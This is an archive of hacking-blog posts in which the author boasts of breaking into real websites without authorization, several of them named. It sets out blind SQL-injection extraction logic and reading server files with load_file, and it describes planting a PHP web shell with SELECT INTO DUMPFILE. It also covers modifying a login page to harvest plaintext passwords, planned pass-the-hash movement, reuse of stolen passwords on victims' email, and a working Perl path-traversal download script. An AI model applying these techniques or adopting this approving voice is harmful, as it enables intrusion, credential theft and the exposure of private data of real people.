Archive for SQL injection

Why SQL injections are dangerous to overall system security?

Posted in SQL injection with tags , , , , on February 1, 2011 by Xacker

Here is something quick from the latest experience I had in the past month.

I found a website vulnerable to an SQL injection attack, which was originally caused because of a human-error.

The original web application was not vulnerable, but some administrator modified the page to provide users with a flexible use of information. Information passed by the users were not sanitized at all, therefore, vulnerability was born from ashes.

The funny part is that the vulnerable parameter was an integer, which all you need to sanitize it is to use the PHP function: intval() – as simple as that!

Using the SQL vulnerability I was able to read database data using a somewhat complex SQL query. I had to extract the information one byte at a time using Boolean expressions, scan the page for a certain text that appears when the expression returns True, to decide if I got the right byte, i.e:

Pseudo code:

for (i = 1; 1==1; i++)

{

for (ch = 0x61; isTrue; ch++)

{

(case when (hex(select mid(column,i,1) from table) = ch) then 187 else 0 end)

// scan the page for “List of products:”

// (found ? got the correct byte, save it, move to next byte : otherwise continue)

isTrue = false;

}

isTrue = true;

// check if there are more bytes left

// (not anymore? break : otherwise continue)

}

This method worked well, however, it took me a very long time to extract the information I wanted even after I wrote a Python script to automate the process and improved it couple of times to avoid scanning the whole possible alphabet set.

Two days later I changed my query to another complex one using MySQL function: load_file() – not that I haven’ thought of it before, but at the time of discovery it wasn’t possible to go right ahead and use it just like that.

I was able to get the result with one single shot.

For my surprise (not really), I found that the current MySQL user was ‘root’ with the almighty privileges 😛

Went ahead and extracted the root password hash, it was of MySQL 3.23 type… (that shouldn’t be hard!) but it was 😦

The hash wasn’t found in any database of tens I’ve searched in. I’ve even created my own rainbow table (loweralpha_numeric_1-6) but got no result (I know it’s not the superb rainbow table settings but that what I could afford creating in couple of days on my CPU).

Hmm… so what now? Give up and run away with what I’ve got before I get hammered?

Not yet baby. I have ‘root’ privileges remember? Means I have ‘FILE’ privileges. Means I can read any arbitrary file on the affected server, time for the SAM 😉 (oh yeah, I’m doing a Windows server)

SAM database contains the NTLM hashes of the system groups. Only problem is that on Win2k and later, the SAM database is protected by the syskey, which is stored in another database encrypted with AES-128 😦 unfortunately, the syskey was enabled by default. Hence, it would be a waste of time trying to get my hands on both files.

Hmm… and now? Easy man 🙂 in order for PHP to communicate with the database, the SQL connection requires the username & password, which are luckily stored as plaintext }: ]

So with ‘FILE’ privilege, I went ahead and acquired a copy of several PHP files (one by one, scanning for any include, include_once, require, require_once). To make things even more challenging, the files were encoded by Zend Guard 😦

No problem, deZend tools are all over the Internet. Got one, decoded the files and there was it, the root password in plaintext on a silver plate.

Using the password I was able to connect to the database through PHPMyAdmin control panel.

Enough? Nooo.. the fun has just started.

I need to own the system now. But how? Well, a PHP shell is more than enough 😀

Wrote a PHP shell, converted it to hexadecimal, inserted the hexadecimal content into a table on the affected server, and with a simple query:

SELECT shell INTO DUMPFILE ‘c:/wamp/www/shell.php’ FROM stupid_table

I dropped the shell into the affected server J

Thanks to the PHP shell I’m now able to control the system, upload/download/edit/delete/copy/move files, browse disk drives, execute system commands, use the server as zombie to attack different servers… you name it!

I didn’t even have to crack over 700 hashes, I simply modified the login page to save a plaintext copy of the password before resuming the normal functions… in approx 10 hours, I had over 300 logins 😀

What next?

To be honest … I’m going to attack the rest of the network, there are several systems attached to the affected server… and I’m curious about their contents.

How am I going to do that? “Pass-the-Hash” attack 😉

In conclusion:

SQL injections can lead to full system compromise if running with high privileges.

As for the time being… I better get back to my work before my boss come break my neck :s

I hope you have enjoyed reading.

– Xacker has left the building (for a sip of coffee :P)

SQL Injection

Posted in SQL injection with tags , on December 16, 2010 by Xacker

 

yet another SQL injection

Posted in SQL injection with tags , , on December 4, 2010 by Xacker

Here I am again, fishing MD5 hashed passwords along with usernames, after successfully exploiting an SQL injection vulnerability in a website. “the website identity will remain enclosed at the time being due to the sensitivity of the operation”

I had to tune my injection multiple times until I was able to extract full data at once and not byte-by-byte extraction.

In order to extract the complete ~950 hashes, I wrote a small python script to automate the process.

it was a great fun 🙂

Enjoy and stay tuned for another hack!

Job.sy: Hacked

Posted in SQL injection with tags , , , , on October 26, 2010 by Xacker

Job.sy: Hacked

As promised earlier this month, I’ve nailed Job.sy today.. in other words, hacked it 🙂

Here is a screenshot off their admin control panel.. uh oh .. I mean, their new admin control panel 🙂

and another off their user table

Enjoy, and stay tuned for MOARRRRRR 😉

Syriantalent.com: Hacked

Posted in SQL injection with tags , , , on October 14, 2010 by Xacker

A while ago my company email received a job employment website advertisement. I bookmarked their URL and paid them a visit that day, by the end of the day they were all dancing of joy.

I had total control over their website but I’m not into destroying people’s work and ruining their lives.. nah I ain’t seriously 😛 .. so I only altered the “Privacy Statement” page which contains bullsh!t about people’s data being safe and all as members passwords were stored as plain-text.

Any attacker who gets through their security measures can have a copy of every member phone number, email, password, personal data, CVs, personal pictures.. etc.

The funny part is that I know (and you should too) that most people use one password.. two passwords at max for.. listen to this.. for EVERYTHING!

I’ts not easy to remember 5 passwords or more, me for example use two passwords, one for registration at some random or non-important website; the other I use for my personal email & important websites to me (my blog, my ArabTeam2000 password.. etc)

I’ve tried couple of passwords on registered members personal emails, some worked, some didn’t (perhaps they’ve changed it since the last time they have registered with the website).

One of my friends had an account their, I was able to login to his Hotmail account and he was like “Oh man! please don’t do anything, I have private stuff there you know.. I trust you dude .. completely” 😀

Finally, if you take a second look at the picture up there and notice the date of the attack, it happened 15 days ago.. here is how much safety you get from them: http://www.syriantalent.com/pages.php?sectionid[]=6&pageid=19&lang=en

Enjoy, and stay tuned for a “Job.sy: Hacked” news 😉

update (26/10/2010): have you waited too long? 😉 check out: https://xacker.wordpress.com/2010/10/26/job-sy-hacked/

Script source code disclosure could mean full compromising

Posted in Programming, Security with tags , , , on February 18, 2009 by Xacker

Hello,

I have been playing lately with some websites security since it was extremely bored for me after finishing my exams to have nothing better to do.. yeah I know I still got to finish the CCNA course and get over with that but call me lazy I’ve wasted alot of valuable time 😦

Never mind that for a second, what I bring to you today is a closer look on websites security and what could a simple human error do with your website.

Take for example our website today, http://vulnerable.edu.xx [Link kept private for.. well, I might have some black hat touch here but I still don’t want anyone to compromise the website for fun! as we all know, it was always for “educational purposes only” :D] — the website appeared to be vulnerable to Script source code disclosure which entitled me to have a copy of every single file on the website that appeared on my crawler, including the famous ‘passwd‘ file [unfortunately the passwords were kept encrypted in the ‘shadow‘ file 😦 — wasn’t hard to guess the path once I got the ability to get any file :)]

So with a fast dirty perl code I wrote on a rush (took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host 🙂

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (< handle >) { #remove the spaces between handle and <>, WP parser sucks
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while (@dir[$i]) {
        mkdir @dir[$i];
        chdir './'.@dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?'
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}
just an example, one of the folders :)

just an example, one of the folders 🙂

let’s hope it’s not your site 😀